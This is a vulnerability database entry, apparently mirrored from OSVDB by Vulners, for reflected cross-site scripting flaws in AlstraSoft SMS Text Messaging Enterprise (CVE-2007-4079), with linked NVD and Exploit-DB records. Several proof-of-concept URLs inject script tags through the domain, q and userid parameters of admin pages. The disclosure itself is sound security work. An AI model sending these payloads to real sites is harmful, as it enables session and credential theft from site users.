Search...

AlstraSoft SMS Text Messaging Enterprise admin/membersearch.php Multiple Variable XSS

2007-07-22T00:00:00

ID OSVDB:37867
Type osvdb
Reporter OSVDB
Modified 2007-07-22T00:00:00

Description

Manual Testing Notes

http://[Victim]/admin/membersearch.php?pagina=17&q=la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E http://[Victim]/admin/membersearch.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit

References:

Related OSVDB ID: 37868 Other Advisory URL: http://lostmon.blogspot.com/2007/07/alstrasoft-multiple-products-multiple.html CVE-2007-4079 Bugtraq ID: 25022

JSON Vulners Source

Initial Source

{"href": "https://vulners.com/osvdb/OSVDB:37867", "history": [], "id": "OSVDB:37867", "reporter": "OSVDB", "published": "2007-07-22T00:00:00", "description": "## Manual Testing Notes\nhttp://[Victim]/admin/membersearch.php?pagina=17&q=la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E\nhttp://[Victim]/admin/membersearch.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit\n## References:\n[Related OSVDB ID: 37868](https://vulners.com/osvdb/OSVDB:37868)\nOther Advisory URL: http://lostmon.blogspot.com/2007/07/alstrasoft-multiple-products-multiple.html\n[CVE-2007-4079](https://vulners.com/cve/CVE-2007-4079)\nBugtraq ID: 25022\n", "title": "AlstraSoft SMS Text Messaging Enterprise admin/membersearch.php Multiple Variable XSS", "lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "hash": "335976fbdc61dfde8d05c6bc9b6b1daca1fe595ffdc4e752aa5711e28e75b9a0", "references": [], "edition": 1, "cvelist": ["CVE-2007-4079"], "affectedSoftware": [], "viewCount": 1, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2017-04-28T13:20:33"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4079"]}, {"type": "osvdb", "idList": ["OSVDB:37868"]}, {"type": "exploitdb", "idList": ["EDB-ID:30368", "EDB-ID:30367"]}], "modified": "2017-04-28T13:20:33"}, "vulnersScore": 5.7}, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d95cbabf2f7ee48cbc34ddb5f077bfd1"}, {"key": "cvss", "hash": "6e9bdd2021503689a2ad9254c9cdf2b3"}, {"key": "description", "hash": "25435f25cffb23f46c035647ec6ff491"}, {"key": "href", "hash": "64e2af4bc499c624e081af09ead622a1"}, {"key": "modified", "hash": "8c79e27221e0cede4b57d0065ba726e2"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "8c79e27221e0cede4b57d0065ba726e2"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "f28e5251110c5734a048bfa6f48dff6e"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "objectVersion": "1.2", "modified": "2007-07-22T00:00:00"}

{"cve": [{"lastseen": "2019-05-29T18:09:00", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft SMS Text Messaging Enterprise allow remote attackers to inject arbitrary web script or HTML via the (1) domain or (2) q parameter to (a) admin/membersearch.php, or (3) the userid parameter to (b) admin/edituser.php.", "modified": "2008-11-15T06:55:00", "id": "CVE-2007-4079", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4079", "published": "2007-07-30T17:30:00", "title": "CVE-2007-4079", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:33", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[Victim]/admin/edituser.php?userid=Walltrapas\"><script>alert()</script>\n## References:\n[Related OSVDB ID: 37867](https://vulners.com/osvdb/OSVDB:37867)\nOther Advisory URL: http://lostmon.blogspot.com/2007/07/alstrasoft-multiple-products-multiple.html\n[CVE-2007-4079](https://vulners.com/cve/CVE-2007-4079)\nBugtraq ID: 25022\n", "modified": "2007-07-22T00:00:00", "published": "2007-07-22T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:37868", "id": "OSVDB:37868", "title": "AlstraSoft SMS Text Messaging Enterprise admin/edituser.php userid Variable XSS", "type": "osvdb", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T12:15:01", "bulletinFamily": "exploit", "description": "AlstraSoft SMS Text Messaging Enterprise 2.0 admin/edituser.php userid Parameter XSS. CVE-2007-4079 . Webapps exploit for php platform", "modified": "2007-07-23T00:00:00", "published": "2007-07-23T00:00:00", "id": "EDB-ID:30368", "href": "https://www.exploit-db.com/exploits/30368/", "type": "exploitdb", "title": "AlstraSoft Sms Text Messaging Enterprise 2.0 admin/edituser.php userid Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/25022/info\r\n \r\nSMS Text Messaging Enterprise is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.\r\n \r\nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.\r\n \r\nhttp://www.example.com/admin/edituser.php?userid=Walltrapas\"><script>alert()</script> ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30368/"}, {"lastseen": "2016-02-03T12:14:54", "bulletinFamily": "exploit", "description": "AlstraSoft SMS Text Messaging Enterprise 2.0 admin/membersearch.php Multiple Parameter XSS. CVE-2007-4079 . Webapps exploit for php platform", "modified": "2007-07-23T00:00:00", "published": "2007-07-23T00:00:00", "id": "EDB-ID:30367", "href": "https://www.exploit-db.com/exploits/30367/", "type": "exploitdb", "title": "AlstraSoft Sms Text Messaging Enterprise 2.0 admin/membersearch.php Multiple Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/25022/info\r\n\r\nSMS Text Messaging Enterprise is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.\r\n\r\nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. \r\n\r\nhttp://www.example.com/admin/membersearch.php?pagina=17&q=la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E\r\nhttp://www.example.com/admin/membersearch.php?q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/30367/"}]}